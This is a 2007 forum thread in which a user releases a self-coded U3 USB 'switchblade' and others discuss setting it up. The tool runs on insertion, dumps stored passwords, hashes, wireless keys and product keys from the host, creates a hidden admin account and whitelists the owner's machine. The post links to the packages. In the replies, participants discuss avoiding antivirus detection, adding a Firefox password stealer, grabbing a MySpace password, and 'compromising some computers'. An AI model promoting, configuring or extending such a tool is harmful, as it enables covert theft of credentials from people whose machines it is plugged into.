Obi-Wahn Posted July 18, 2007 Share Posted July 18, 2007 Hello everybody! Today, I'll release my self coded switchblade. It's a complete package, including all tools needed. Download U3P Package: http://www.autohotkey.net/~Obi-Wahn/hak5/m...Switchblade.u3p Download Non-U3 Package with .exe: http://www.autohotkey.net/~Obi-Wahn/hak5/m...e_exe_nonu3.zip Download Non-U3 Package with .bat: http://www.autohotkey.net/~Obi-Wahn/hak5/m...chblade_bat.zip Download Manual (.pdf): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.pdf Download Manual (.doc): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.doc Info's: The U3 Package works full. The Non-u3 Package (.exe and .bat) works also, but there are "quick and dirty" coded. So (especially the .bat package) may the downloader checks the sourcecode again. I've only written this because not everyone want to learn AHK or is able to "understand" ahk. Post Bugs and Errors here, send a PM or a Mail. And a feedback 'd be nice. Regards Obi-Wahn EDIT: Sorry, I had to hurry up yesterday. My U3 Switchblade is written in AutoHotkey, which is similar to Auto-IT. How to install and configure this tool is in the Manual. It is possible to: Dump System Information's (including Computername, Username, Adminstate of the user, Systemroot-, Application- , common application- and Comspec-path, Operating System, Language and Screen-Res, including a network information dump all in one file) Stop any kind of process Copy the clipboard to a file Dump Passwords from the Protected Storage Dump Network passwords dump Messenger Passwords dump Mailpasswords Dump History of the IE dump and decrypt passwords of Opera's wand file (if exist, works at least up to version 9.10) dump productkeys Dump User Password hashes dump dial-up passwords dump IE Passwords dump wireless passwords dump SID dump a list of installed software, including hotfixes dump a list of services dump a list of tcp connections dumps and decrypts the ASP.Net Account password Create a new, administrative user (username and password stored into the .ini), including German and English language support for success report Start Additional Programs, stored into the .ini, including optional hidden starting Trys to restart the terminated processes after finishing Further is it possible to add computers (in combination with the username) to a "watchlist". If the computer with the current user is into the list, the program will exit without dumping any data. It's possible to use the .exe without any other stuff to use the process-terminate-routine, the process-restart-routine, the sysinfo and the user-creation as standalone (.ini is needed) tool. For Standalone usage, read the manual or type "switchblade.exe /?" Developers are also welcome. Type "switchblade.exe /Src" to append the sourcecode to a file or -if you use the u3p package- hold CTRL down, while starting the Switchblade. Then it will append the sourcecode to a file and exit the program. All tools are included. Quote Link to comment Share on other sites More sharing options...
elmer Posted July 18, 2007 Share Posted July 18, 2007 Hmm... I think .u3p can only work with a stock U3 drive. I guess that I will have to find the restore .exe. Does this run automatically, or do you have to click a button? I haven't grabbed the manuals yet, so those will help. What does it do? Quote Link to comment Share on other sites More sharing options...
Obi-Wahn Posted July 19, 2007 Author Share Posted July 19, 2007 Sorry. I had to hurry up yesterday. However. Usage added @ first post. Yes, the .u3p package has to use with a Stock u3 drive (which I use). After installation of the u3 package, you have to go to the manage programs dialog, and activate "start on insertion" for the switchblade. Then (without terminating and restarting processes) it takes about 45 Seconds, depending on the computer to dump all informations. I've configurated my switchblade not to kill and restart processes. I've only added this feature if e.g. a scanner detects a tool as a virus, but scanned with Avast, AVG and Norton, nothing happend. Quote Link to comment Share on other sites More sharing options...
elmer Posted July 19, 2007 Share Posted July 19, 2007 So, anyone have a link to the way to revert my USB drive to normal U3? Also, did you write absolutely all of it? Quote Link to comment Share on other sites More sharing options...
Obi-Wahn Posted July 21, 2007 Author Share Posted July 21, 2007 May THIS will work. And yes, I wrote the complete switchblade (.exe / .bat, Manifest-File, processlist) and created the Icon, based on the Switchblade-logo from the wiki and the HAK5 logo. Quote Link to comment Share on other sites More sharing options...
elmer Posted July 22, 2007 Share Posted July 22, 2007 Well, I just downloaded the LPInstaller.exe and I am backing up my thumb drive, so soon I will be able to test this. In the meantime, I downloaded the bat version and have to say that the code looks great. This is a really great payload. EDIT: Yay! I installed it! I have a few questions for you: How do you configure what your computer is in the u3p package? By "Start on insertion," do you mean this: (click for larger picture) Quote Link to comment Share on other sites More sharing options...
Obi-Wahn Posted July 23, 2007 Author Share Posted July 23, 2007 After installation of the Package, you have to start the switchblade on your computer. It'll create a hidden Directory "Switchblade" on the writeable partition. there are two files into. A processlist and a .ini-File. In the .ini File, there's a Section called Mycomputers. There you can add computers / users to ignore by adding lines like "index=Computername_username". on startup, it checks the section and if it's plugged into a system with the correct Computer_Username combination, it'll exit. Example: [MYCOMPUTERS] # If you want to add more Computer-User combinations # Write in every line a Array of numbers. Eg: # 1=Computername_Username # 2=... # ... 1=OBI-WAHN_Andreas 2=ANDREAS_Obi-Wahn This is my configuration. The #1 entry is filled in by starting the package the first time. so you have to plugged it into your computer while starting. Yes. I mean this dialog. Quote Link to comment Share on other sites More sharing options...
darkjoker Posted July 26, 2007 Share Posted July 26, 2007 ty Obi-Wahn i love the program i havent been able to find a good u3 switchblade yet untill yours so ty and keep up the good work Quote Link to comment Share on other sites More sharing options...
elmer Posted July 26, 2007 Share Posted July 26, 2007 Thanks, Obi-Wahn. I never had noticed the .ini file. It's all configured now, all I need to do is compromise some computers. :twisted: . By the way, they have a ninja smiley on these boards! :ninja: . It's so awesome. Quote Link to comment Share on other sites More sharing options...
Charlie123 Posted July 27, 2007 Share Posted July 27, 2007 Congrats it's an excellent prog! IS there a way to script in to retrieve a user's myspace pw also ? lol 8) Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted July 27, 2007 Share Posted July 27, 2007 So none of the AVs pick this one up as of yet? even if u have it pull all the passwords? Also would it be possible to add a Firefox Password Puller? Quote Link to comment Share on other sites More sharing options...
Obi-Wahn Posted July 27, 2007 Author Share Posted July 27, 2007 @Charlie: Believe it or not, I wasn't ever on myspace, so may your post is joke (cause of "lol") or not. If not, show me a tool, and I'll try it. @setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (accordingly to ZA Firewall). And I've add a FF password reader, which works on a testinstallation of FF on my machine. Setting into the .ini File: Section "DUMP", Key "FFPasswords" Quote Link to comment Share on other sites More sharing options...
elmer Posted July 27, 2007 Share Posted July 27, 2007 I just tested it on a computer with a fully updated version of Clamwin, and it worked seemingly perfect. Quote Link to comment Share on other sites More sharing options...
GonZor Posted July 27, 2007 Share Posted July 27, 2007 So none of the AVs pick this one up as of yet? even if u have it pull all the passwords? Also would it be possible to add a Firefox Password Puller? @setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (accordingly to ZA Firewall). And I've add a FF password reader, which works on a testinstallation of FF on my machine. Setting into the .ini File: Section "DUMP", Key "FFPasswords" NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is you have used the most recent versions? (eg mailpv.exe) Quote Link to comment Share on other sites More sharing options...
Charlie123 Posted July 27, 2007 Share Posted July 27, 2007 I was just wondering (i.e. myspace pw ) Your Switchblade seems to retrieve everything else :P,,, Im still looking to see if there is a cookie stored for it or not,,, If not then keylogger is pretty much the only way I guess... :? Quote Link to comment Share on other sites More sharing options...
elmer Posted July 28, 2007 Share Posted July 28, 2007 Wow, you're really adamant about getting MySpace passwords. MySpace is no different than any other website, that is, technologically. I don't think I will extol the "virtues" of MySpace at this point in time. But, back to what I was talking about. If the user has the password set to auto fill, LSA Secrets, IE Password, DeWand (UnWand?), or Firefox Password should grab it. Quote Link to comment Share on other sites More sharing options...
Charlie123 Posted July 29, 2007 Share Posted July 29, 2007 @elmer....Just keeping "My" kids on the straight and narrow!!! they both have accounts there... Thanks for the info!! Quote Link to comment Share on other sites More sharing options...
darkjoker Posted July 29, 2007 Share Posted July 29, 2007 where does it dump all the info to? i cant find it Edit: never mind i found it Quote Link to comment Share on other sites More sharing options...
Obi-Wahn Posted July 30, 2007 Author Share Posted July 30, 2007 I found a big bug into my switchblade. On one system, Switchblade hangs when Ignoremycomputers=Yes. I'll fix it, and upload it asap. Quote Link to comment Share on other sites More sharing options...
Skunkfoot Posted August 19, 2007 Share Posted August 19, 2007 I just tried this one out dude, and I gotta say, very nice job! :D I did run into a little problem though. See, I was testing this on my other laptop, so when I ran the file the first time, it recorded my comp's name, and since it's set to skip over your own comp without dumping anything, the first 3 times I tried it, I didn't get any output. Then I realized that I'm a moron and edited that option, and it worked great :D Quote Link to comment Share on other sites More sharing options...
RedRaven Posted August 22, 2007 Share Posted August 22, 2007 Nice one, except for Windows 2000 operating systems :) When I inserted the device in a clean Win2K box, a 'no disk' error was returned. Seems to be a problem in a lot of SwitchBlades :D Quote Link to comment Share on other sites More sharing options...
jinster364 Posted September 21, 2007 Share Posted September 21, 2007 i installed the u3 version of this. when i first opened it, it said is this the first time using this program or w/e i clicked yes. then nothing happened, i thought there was supposed to be like an int file and config file so i can like change the options but i dunno where it is. its not on the flash drive. Quote Link to comment Share on other sites More sharing options...
darkjoker Posted September 22, 2007 Share Posted September 22, 2007 i installed the u3 version of this. when i first opened it, it said is this the first time using this program or w/e i clicked yes. then nothing happened, i thought there was supposed to be like an int file and config file so i can like change the options but i dunno where it is. its not on the flash drive. the part where you click yes is so that it dont steal passwords on ur computer and to get to the config u go to the spot the documents part is and set ur computer to show hidden files and there should be a file there that says dump right click it and tell it to open it with notepad and there is the config u can change. make sure u dont go into the document folder go to where u see where it says documents. Quote Link to comment Share on other sites More sharing options...
Skunkfoot Posted October 22, 2007 Share Posted October 22, 2007 Hey Obi, I really like the way you made this thing so that it can be added to the LP on my U3, but I ran into a bit of a problem. See, I wanted to add the USB HackSaw to that Switchblade you made, but I can't "just add Hacksaw to your existing Switchblade by copying the SBS folder inside the CMD folder and add the go.cmd to your current go.cmd." because there's no SBS or CMD folders. Do you think you could make a version of the USB HackSaw that's similar to your version of the USB Switchblade? Cause that would be awesome... thanks in advance --Skunkfoot Quote Link to comment Share on other sites More sharing options...
RadarG Posted October 22, 2007 Share Posted October 22, 2007 I do have a couple of questions. 1. Is the package installed to the non writable portion of the U3 drive? 2. If an AV picks anything up, will it destroy the files or prevent them from running? Also in the folder where the dump is located at I see a bunch of ff_passwordsXX.txt when I open up these files I see an error that states what is this error? Initialization failed , Make sure key3.db and cert8.db files are present in the specified directory Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.